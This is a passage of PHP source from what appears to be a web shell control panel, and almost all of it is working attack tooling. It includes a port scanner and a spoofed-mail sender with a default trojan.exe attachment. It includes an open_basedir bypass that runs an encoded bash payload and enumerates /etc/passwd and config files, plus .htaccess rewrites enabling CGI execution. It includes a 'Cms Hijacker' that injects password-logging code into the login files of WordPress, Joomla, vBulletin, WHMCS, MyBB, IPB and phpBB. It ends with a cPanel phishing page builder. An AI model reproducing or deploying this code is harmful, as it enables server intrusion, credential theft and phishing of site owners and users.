                        echo "<center>Domain Reseller <br><center>";
                        echo "<center><table border='1'>";
                        echo "<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>{$registrar}</td></tr></b>";
                        echo "<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>{$setting}</td></tr></b>";
                        echo "<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>{$value}</td></tr></b>";
                        echo "</table><br><br></center>";
                    }
                }
            } else {
                __alert('<font color="red">tblservers is Empty...!</font>');
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaportscanner()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Port Scaner |</div></p>\r\n<form action=\"\" method=\"post\" onsubmit=\"g('portscanner',null,null,this.start.value,this.end.value,this.host.value); return false;\">\r\n<input type=\"hidden\" name=\"y\" value=\"phptools\">\r\n<div class=\"txtfont\">Host: </div> <input id=\"text\" type=\"text\" name=\"host\" value=\"localhost\"/>\r\n<div class=\"txtfont\">Port start: </div> <input id=\"text\" size=\"5\" type=\"text\"  name=\"start\" value=\"80\"/>\r\n<div class=\"txtfont\">Port end: </div> <input id=\"text\" size=\"5\" type=\"text\" name=\"end\" value=\"80\"/> <input type=\"submit\" value=\" \" />\r\n</form></center><br>";
        $start = strip_tags($_POST['alfa2']);
        $end = strip_tags($_POST['alfa3']);
        $host = strip_tags($_POST['alfa4']);
        if (isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])) {
            echo __pre();
            $packetContent = "GET / HTTP/1.1\r\n\r\n";
            if (ctype_xdigit($packetContent)) {
                $packetContent = @pack("H*", $packetContent);
            } else {
                $packetContent = str_replace(array("\r", "\n"), "", $packetContent);
                $packetContent = str_replace(array("\\r", "\\n"), array("\r", "\n"), $packetContent);
            }
            for ($i = $start; $i <= $end; $i++) {
                $sock = @fsockopen($host, $i, $errno, $errstr, 3);
                if ($sock) {
                    stream_set_timeout($sock, 5);
                    fwrite($sock, $packetContent . "\r\n\r\n\x00");
                    $counter = 0;
                    $maxtry = 1;
                    $bin = "";
                    do {
                        $line = fgets($sock, 1024);
                        if (trim($line) == "") {
                            $counter++;
                        }
                        $bin .= $line;
                    } while ($counter < $maxtry);
                    fclose($sock);
                    echo "<center><p>Port <font style='color:#DE3E3E'>{$i}</font> is open</p>";
                    echo "<p><textarea style='height:140px;width:50%;'>" . $bin . "</textarea></p></center>";
                }
                flush();
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfacgihtaccess($m, $d = '', $symname = false)
    {
        $readme = "";
        if ($symname) {
            $readme = "\nReadmeName " . trim($symname);
        }
        if ($m == 'cgi') {
            $code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
        } elseif ($m == 'sym') {
            $code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
        } elseif ($m == 'shtml') {
            $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
        }
        @__write_file($d . ".htaccess", $code);
    }
    function alfabasedir()
    {
        alfahead();
        echo "<div class=header>\r\n<center><p><div class=\"txtfont_header\">| Open Base Dir |</div></p></center>";
        $passwd = _alfa_file('/etc/passwd');
        if (is_array($passwd)) {
            $users = array();
            $makepwd = alfaMakePwd();
            $basedir = @ini_get('open_basedir');
            $safe_mode = @ini_get('safe_mode');
            if (_alfa_can_runCommand(true, false) && ($basedir || $safe_mode)) {
                $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
                $tmp_path = alfaWriteTocgiapi("basedir.alfa", $bash);
                $bash_users = alfaEx("cd " . $tmp_path . "/alfacgiapi;sh basedir.alfa " . $makepwd, false, true, true);
                $users = json_decode($bash_users, true);
                $x = count($users);
                if ($x >= 2) {
                    array_pop($users);
                    --$x;
                }
            }
            if (!$basedir && !$safe_mode) {
                $x = 0;
                foreach ($passwd as $str) {
                    $pos = strpos($str, ':');
                    $username = substr($str, 0, $pos);
                    $dirz = str_replace("{user}", $username, $makepwd);
                    if ($username != '') {
                        if (@is_readable($dirz)) {
                            array_push($users, $username);
                            $x++;
                        }
                    }
                }
            }
            echo "<br><br>";
            echo "<b><font color=\"#00A220\">[+] Founded " . sizeof($passwd) . " entrys in /etc/passwd\n" . "<br /></font></b>";
            echo "<b><font color=\"#FFFFFF\">[+] Founded " . $x . " readable " . str_replace("{user}", "*", $makepwd) . " directories\n" . "<br /></font></b>";
            echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n<br /><br /><br /></font></b>";
            foreach ($users as $user) {
                if (empty($user)) {
                    continue;
                }
                $path = str_replace("{user}", $user, $makepwd);
                echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>{$user}</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='{$path}'><input type=submit value='>>'></form><br>";
            }
        } else {
            echo "<b> <center><font color=\"#FFFFFF\">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>";
        }
        echo "<br><br></b>";
        echo "</div>";
        alfafooter();
    }
    function alfamail()
    {
        alfahead();
        echo "<div class=header>";
        AlfaNum(8, 9, 10);
        echo "<center><p><div class=\"txtfont_header\">| Fake Mail |</div></p><form action=\"\" method=\"post\" onsubmit=\"g('mail',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,'>>',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;\">";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60', 'placeholder' => true), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'] . 'trojan.exe', 'inputSize' => '60'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60'));
        create_table($table);
        echo "<p><div class=\"txtfont\">Message:</div></p><textarea rows=\"6\" cols=\"60\" name=\"mail_content\">Hi Dear Admin :)</textarea><p><input type=\"submit\" value=\" \" name=\"mail_send\" /></p></form></center>";
        if (isset($_POST['alfa4']) && $_POST['alfa4'] == '>>') {
            $mail_to = $_POST['alfa1'];
            $mail_from = $_POST['alfa2'];
            $mail_subject = $_POST['alfa3'];
            $mail_content = $_POST['alfa5'];
            $count_mail = (int) $_POST['alfa6'];
            $mail_attach = $_POST['alfa7'];
            if (filter_var($mail_to, FILTER_VALIDATE_EMAIL)) {
                if (!empty($mail_attach) && @is_file($mail_attach)) {
                    $file = $mail_attach;
                    $content = __read_file($file);
                    $content = chunk_split(__ZW5jb2Rlcg($content));
                    $uid = md5(uniqid(time()));
                    $filename = basename($file);
                    $headers = "From: " . $mail_from . " <" . $mail_from . ">\r\n";
                    $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) \r\n";
                    $headers .= "Reply-To: " . $mail_from . "\r\n";
                    $headers .= "Content-Type: multipart/mixed; boundary=\"" . $uid . "\"\r\n\r\n";
                    $headers .= "MIME-Version: 1.0\r\n";
                    $headers .= "X-Mailer: php\r\n";
                    $mail_content = "--" . $uid . "\r\n";
                    $mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
                    $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
                    $mail_content .= $mail_content . "\r\n\r\n";
                    $mail_content .= "--" . $uid . "\r\n";
                    $mail_content .= "Content-Type: application/octet-stream; name=\"" . $filename . "\"\r\n";
                    $mail_content .= "Content-Transfer-Encoding: base64\r\n";
                    $mail_content .= "Content-Disposition: attachment; filename=\"" . $filename . "\"\r\n\r\n";
                    $mail_content .= $content . "\r\n\r\n";
                    $mail_content .= "--" . $uid . "--";
                } else {
                    $headers = "From: " . $mail_from . " ( " . $mail_from . " ) \r\n";
                    $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) \r\n";
                    $headers .= 'Reply-To: ' . $mail_from . '' . "\r\n";
                    $headers .= "Content-type: text/html; charset=utf-8\r\n";
                    $headers .= "MIME-Version: 1.0\r\n";
                    $headers .= "X-Mailer: php\r\n";
                }
                if (empty($count_mail) || $count_mail < 1) {
                    $count_mail = 1;
                }
                if (!empty($mail_from)) {
                    echo __pre();
                    for ($i = 1; $i <= $count_mail; $i++) {
                        if (@mail($mail_to, $mail_subject, $mail_content, $headers)) {
                            echo "<center>Sent -> {$mail_to}<br></center>";
                        }
                    }
                } else {
                    __alert("Invalid Mail From !");
                }
            } else {
                __alert("Invalid Mail To !");
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaziper()
    {
        alfahead();
        AlfaNum(8, 9, 10);
        echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="' . (!empty($_POST['alfa3']) ? htmlspecialchars($_POST['alfa3']) : htmlspecialchars($GLOBALS['cwd'])) . '" size="60"/>
<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="' . $GLOBALS['cwd'] . 'alfa.zip" size="60"/>
<input type="submit" value=" " name="ziper" />
</form></center></p>';
        if (isset($_POST['alfa5']) && $_POST['alfa5'] == '>>') {
            $dirzip = $_POST['alfa3'];
            $zipfile = $_POST['alfa4'];
            if ($GLOBALS['sys'] != 'unix' && _alfa_can_runCommand(true, true)) {
                alfaEx("powershell Compress-Archive -Path '" . addslashes($dirzip) . "' -DestinationPath '" . addslashes(basename($zipfile)) . "'");
                echo __pre() . '<center><p>Done -> <b><font color="green">' . $zipfile . '</font></b></p></center>';
            } elseif ($GLOBALS['sys'] == 'unix' && _alfa_can_runCommand(true, true)) {
                alfaEx("cd '" . addslashes(dirname($zipfile)) . "';zip -r '" . addslashes(basename($zipfile)) . "' '" . addslashes($dirzip) . "'");
                echo __pre() . '<center><p>Done -> <b><font color="green">' . $zipfile . '</font></b></p></center>';
            } elseif (class_exists('ZipArchive')) {
                if (__alfaziper($dirzip, $zipfile)) {
                    echo __pre() . '<center><p><font color="green">Success...!<br>' . $zipfile . '</font></p></center>';
                } else {
                    echo __pre() . '<center><p><font color="red">ERROR!!!...</font></p></center>';
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function __alfaziper($source, $destination)
    {
        if (!extension_loaded('zip') || !file_exists($source)) {
            return false;
        }
        $zip = new ZipArchive();
        if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
            return false;
        }
        $source = str_replace('\\', '/', realpath($source));
        if (is_dir($source) === true) {
            $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
            foreach ($files as $file) {
                $file = str_replace('\\', '/', $file);
                if (in_array(substr($file, strrpos($file, '/') + 1), array('.', '..'))) {
                    continue;
                }
                $file = realpath($file);
                if (is_dir($file) === true) {
                    $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
                } else {
                    if (is_file($file) === true) {
                        $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
                    }
                }
            }
        } else {
            if (is_file($source) === true) {
                $zip->addFromString(basename($source), file_get_contents($source));
            }
        }
        return $zip->close();
    }
    function alfadeziper()
    {
        alfahead();
        AlfaNum(8, 9, 10);
        echo '<div class=header><p><center><p><div class="txtfont_header">| DeCompressor |</div></p>
<form onSubmit="g(\'deziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
<div class="txtfont">File: </div> <input type="text" name="dirzip" value="' . (!empty($_POST['alfa3']) ? htmlspecialchars($_POST['alfa3']) : htmlspecialchars($GLOBALS['cwd'])) . '" size="60"/>
<div class="txtfont">Extract To: </div> <input type="text" name="zipfile" value="' . $GLOBALS['cwd'] . '" size="60"/>
<input type="submit" value=" " name="ziper" />
</form></center></p>';
        if (isset($_POST['alfa5']) && $_POST['alfa5'] == '>>') {
            $dirzip = $_POST['alfa3'];
            $zipfile = $_POST['alfa4'];
            if (@(!is_dir($zipfile))) {
                @mkdir($zipfile, 0777, true);
            }
            $finfo = "";
            $file_type = "";
            if (function_exists('finfo_open')) {
                $finfo = @finfo_open(FILEINFO_MIME_TYPE);
                $file_type = @finfo_file($finfo, $dirzip);
                @finfo_close($finfo);
            } else {
                if ($GLOBALS['sys'] == 'unix' && _alfa_can_runCommand(true, true)) {
                    $file_type = alfaEx('file -b --mime-type ' . $dirzip);
                }
            }
            if ($GLOBALS['sys'] != 'unix' && _alfa_can_runCommand(true, true)) {
                alfaEx("powershell expand-archive -path '" . addslashes($dirzip) . "' -destinationpath '" . addslashes(basename($zipfile)) . "'");
                echo __pre() . '<center><p>Done -> <b><font color="green">' . $zipfile . '</font></b></p></center>';
            } elseif ($GLOBALS['sys'] == 'unix' && !empty($file_type) && _alfa_can_runCommand(true, true) && (strlen(alfaEx('which unzip')) > 0 || strlen(alfaEx('which tar')) > 0 || strlen(alfaEx('which gunzip')) > 0)) {
                switch ($file_type) {
                    case 'application/zip':
                        alfaEx("cd '" . addslashes($zipfile) . "';unzip '" . addslashes($dirzip) . "'");
                        break;
                    case 'application/x-tar':
                    case 'application/x-gzip':
                    case 'application/x-gtar':
                        if (strstr(basename($dirzip), ".tar.gz") || strstr(basename($dirzip), ".tar")) {
                            alfaEx("cd '" . addslashes($zipfile) . "';tar xzf '" . addslashes($dirzip) . "'");
                        } else {
                            alfaEx("cd '" . addslashes($zipfile) . "';gunzip '" . addslashes($dirzip) . "'");
                        }
                        break;
                }
                echo __pre() . '<center><p>Done -> <b><font color="green">' . $zipfile . '</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\'' . $zipfile . '\');">[ View Folder ]</a></b></p></center>';
            } elseif (class_exists('ZipArchive')) {
                $itsok = false;
                if (emtpy($file_type)) {
                    $file_type = "application/zip";
                }
                switch ($file_type) {
                    case 'application/zip':
                        $zip = new ZipArchive();
                        $res = $zip->open($dirzip);
                        if ($res) {
                            $zip->extractTo($zipfile);
                            $zip->close();
                            $itsok = true;
                        }
                        break;
                    case 'application/x-tar':
                    case 'application/x-gzip':
                    case 'application/x-gtar':
                        if (strstr(basename($dirzip), ".tar.gz")) {
                            $new_file = $zipfile . '/' . basename($dirzip);
                            @copy($dirzip, $new_file);
                            $new_tar = str_replace(".tar.gz", ".tar", $new_file);
                            try {
                                $p = new PharData($new_file);
                                $p->decompress();
                                $phar = new PharData($new_tar);
                                $phar->extractTo($zipfile);
                                @unlink($new_file);
                                @unlink($new_tar);
                                $itsok = true;
                            } catch (Exception $e) {
                            }
                        } else {
                            try {
                                $phar = new PharData($dirzip);
                                $phar->extractTo($zipfile);
                                $itsok = true;
                            } catch (Exception $e) {
                            }
                        }
                        break;
                }
                if ($itsok) {
                    echo __pre() . '<center><p><font color="green">Success...!<br>' . $zipfile . '</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\'' . $zipfile . '\');">[ View Folder ]</a></p></center>';
                } else {
                    echo __pre() . '<center><p><font color="red">ERROR!!!...</font></p></center>';
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfacmshijacker()
    {
        alfahead();
        AlfaNum(5, 6, 7, 8, 9, 10);
        echo "<div class=header><br>\r\n<center><div class=\"txtfont_header\">| Cms Hijacker |</div><br><br><form onSubmit=\"g('cmshijacker',null,this.cmshi.value,this.saveto.value,'>>',this.cmspath.value);return false;\" method='post'>\r\n<div class=\"txtfont\">CMS: <select style=\"width:100px;\" name=\"cmshi\">";
        $cm_array = array("vb" => "vBulletin", "wp" => "wordpress", "jom" => "joomla", "whmcs" => "whmcs", "mybb" => "mybb", "ipb" => "ipboard", "phpbb" => "phpbb");
        foreach ($cm_array as $key => $val) {
            echo '<option value="' . $key . '">' . $val . '</option>';
        }
        echo "</select>";
        echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
SaveTo: <input size="50" type="text" name="saveto" value="' . $GLOBALS['cwd'] . 'alfa.txt"></font>
<input type="submit" name="btn" value=" "></form></center><br>';
        $cms = $_POST['alfa1'];
        $saveto = $_POST['alfa2'];
        $cmspath = $_POST['alfa4'];
        if (!empty($cms) and !empty($saveto) and $_POST['alfa4'] and $_POST['alfa3'] == '>>') {
            echo __pre();
            alfaHijackCms($cms, $cmspath, $saveto);
        }
        echo "</div>";
        alfafooter();
    }
    function alfaHijackCms($cms, $cmspath, $saveto)
    {
        switch ($cms) {
            case "vb":
                hijackvBulletin($cmspath, $saveto);
                break;
            case "wp":
                hijackwp($cmspath, $saveto);
                break;
            case "jom":
                hijackJoomla($cmspath, $saveto);
                break;
            case "whmcs":
                hijackWhmcs($cmspath, $saveto);
                break;
            case "mybb":
                hijackMybb($cmspath, $saveto);
                break;
            case "ipb":
                hijackIPB($cmspath, $saveto);
                break;
            case "phpbb":
                hijackPHPBB($cmspath, $saveto);
                break;
            default:
                echo "error!";
                break;
        }
    }
    function hijackvBulletin($path, $saveto)
    {
        $code = '$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' .  $alfa_password." (" . $row["email"] . ")\\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
        $clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $login = $path . "/login.php";
        $class = $path . "/includes/class_bootstrap.php";
        $dologin = 'do_login_redirect();';
        $evil_login = "\t" . $code . "\n\t" . $dologin;
        $evil_class = "true";
        if ((@is_file($login) and @is_writable($login)) || (@is_file($class) and @is_writable($class))) {
            $data_login = @file_get_contents($login);
            $data_class = @file_get_contents($class);
            if (strstr($data_login, $dologin) || strstr($data_class, $clearpw)) {
                $login_replace = str_replace($dologin, $evil_login, $data_login);
                $class_replace = str_replace($clearpw, $evil_class, $data_class);
                @file_put_contents($login, $login_replace);
                @file_put_contents($class, $class_replace);
                hijackOutput(0, $saveto);
            } else {
                hijackOutput(1);
            }
        } else {
            hijackOutput(1);
        }
    }
    function hijackwp($path, $saveto)
    {
        $code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
        $redirect_wp = '#if[ ]{0,}\\([ ]{0,}![ ]{0,}is_wp_error\\([ ]{0,}\\$user[ ]{0,}\\)[ ]{0,}&&[ ]{0,}![ ]{0,}\\$reauth[ ]{0,}\\)[ ]{0,}{#';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $login = $path . "/wp-login.php";
        if (@is_file($login) and @is_writable($login)) {
            $data_login = @file_get_contents($login);
            if (@preg_match($redirect_wp, $data_login, $match)) {
                $evil_login = "\t" . $match[0] . "\n\t" . $code;
                $login_replace = @preg_replace($redirect_wp, $evil_login, $data_login);
                @file_put_contents($login, $login_replace);
                hijackOutput(0, $saveto);
            } else {
                hijackOutput(1);
            }
        } else {
            hijackOutput(1);
        }
    }
    function hijackJoomla($path, $saveto)
    {
        $code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $comp = $path . "/administrator/components/com_login/";
        if (@is_file($comp . "/login.php")) {
            $login = $comp . "/login.php";
        } elseif (@is_file($comp . "/admin.login.php")) {
            $login = $comp . "/admin.login.php";
        } else {
            $login = '';
        }
        if (@is_file($login) and @is_writable($login) and $login != '') {
            $data_login = @file_get_contents($login);
            $evil_login = $code . "\n" . $data_login;
            @file_put_contents($login, $evil_login);
            hijackOutput(0, $saveto);
        } else {
            hijackOutput(1);
        }
    }
    function hijackWhmcs($path, $saveto)
    {
        $code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $conf = $path . "/configuration.php";
        if (@is_file($conf) and @is_writable($conf)) {
            $data_conf = @file_get_contents($conf);
            if (!strstr($data_conf, '?>')) {
                $code = '?>' . $code;
            }
            $evil_conf = $data_conf . "\n" . $code;
            @file_put_contents($conf, $evil_conf);
            hijackOutput(0, $saveto);
        } else {
            hijackOutput(1);
        }
    }
    function hijackMybb($path, $saveto)
    {
        $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
        $find = '$loginhandler->complete_login();';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $login = $path . "/member.php";
        $evil_login = "\t" . $code . "\n\t" . $find;
        if (@is_file($login) and @is_writable($login)) {
            $data_login = @file_get_contents($login);
            if (strstr($data_login, $find)) {
                $login_replace = str_replace($find, $evil_login, $data_login);
                @file_put_contents($login, $login_replace);
                hijackOutput(0, $saveto);
            } else {
                hijackOutput(1);
            }
        } else {
            hijackOutput(1);
        }
    }
    function hijackIPB($path, $saveto)
    {
        $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
        $find = 'unset( $member[\'plainPassword\'] );';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $login = $path . "/admin/sources/handlers/han_login.php";
        $evil_login = "\tunset( \$member['plainPassword'] );\n\t" . $code;
        if (@is_file($login) and @is_writable($login)) {
            $data_login = @file_get_contents($login);
            if (strstr($data_login, $find)) {
                $login_replace = str_replace($find, $evil_login, $data_login);
                @file_put_contents($login, $login_replace);
                hijackOutput(0, $saveto);
            } else {
                hijackOutput(1);
            }
        } else {
            hijackOutput(1);
        }
    }
    function hijackPHPBB($path, $saveto)
    {
        $code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
        $find = 'case \'login\':';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $login = $path . "/ucp.php";
        $evil_login = "\tcase 'login':\n\t" . $code;
        if (@is_file($login) and @is_writable($login)) {
            $data_login = @file_get_contents($login);
            if (strstr($data_login, $find)) {
                $login_replace = str_replace($find, $evil_login, $data_login);
                @file_put_contents($login, $login_replace);
                hijackOutput(0, $saveto);
            } else {
                hijackOutput(1);
            }
        } else {
            hijackOutput(1);
        }
    }
    function hijackOutput($c = 0, $p = '')
    {
        echo $c == 0 ? "<center><font color='green'>Success</font> --> path: {$p}</center>" : '<center><font color="red">Error in inject code !</font></center>';
    }
    function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array())
    {
        if (@is_dir($dir)) {
            $files = @scandir($dir);
            foreach ($files as $key => $value) {
                $path = @realpath($dir . DIRECTORY_SEPARATOR . $value);
                if (!@is_dir($path)) {
                    if ($ext != '*') {
                        $f = basename($path);
                        $f = explode('.', $f);
                        $f = end($f);
                        if ($f != $ext) {
                            continue;
                        }
                    }
                    if ($e == 'str') {
                        $content = @file_get_contents($path);
                        if (strpos($content, $string) !== false) {
                            echo str_replace('\\', '/', $path) . "<br>";
                        }
                    } else {
                        if (strstr($value, $string)) {
                            echo str_replace('\\', '/', $path) . "<br>";
                        }
                    }
                    $results[] = $path;
                } elseif ($value != "." && $value != "..") {
                    Alfa_StrSearcher($path, $string, $ext, $e, $results);
                    $results[] = $path;
                }
            }
        }
    }
    function alfafakepage()
    {
        alfahead();
        AlfaNum(9, 10);
        echo "<div class=header><br>\r\n\t<center><div class=\"txtfont_header\">| Host Manager Fake page |</div></center><br><br><form onSubmit=\"g('fakepage',null,this.clone_page.value,this.fake_root.value,'>>',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;\" method='post'>\r\n\t<div class=\"txtfont\" style=\"position: relative;left: 50%;transform: translate(-50%);\"><div style=\"margin-bottom:6px;\"><span style=\"display: inline-block;width: 106px;\">Panel: </span><select style=\"width:100px;\" name=\"panel\">";
        $cm_array = array("cpanel" => "Cpanel", "directadmin" => "DirectAdmin");
        foreach ($cm_array as $key => $val) {
            echo '<option value="' . $key . '">' . $val . '</option>';
        }
        echo "</select></div>";
        echo '<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Clone page: </span><input size="50" type="text" name="clone_page" placeholder="eg: https://target.com:2083 | https://target.com:2222"></div>
	<div style="margin-bottom:6px;"><span>Fake page root: </span><input size="50" type="text" name="fake_root" value="' . $_SERVER["DOCUMENT_ROOT"] . '/fake_page_root/"></div>
	<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Inject to: </span><input size="50" type="text" name="inject_to" value="' . $_SERVER["DOCUMENT_ROOT"] . '/index.php"></div>
	<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Bind on: </span><input size="50" type="text" name="bind_on" placeholder="eg: ' . $_SERVER["DOCUMENT_ROOT"] . '/wp-login.php"></div>
	<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Log To: </span><input size="50" type="text" name="logto" value="' . $GLOBALS['cwd'] . 'logs.txt"></div>
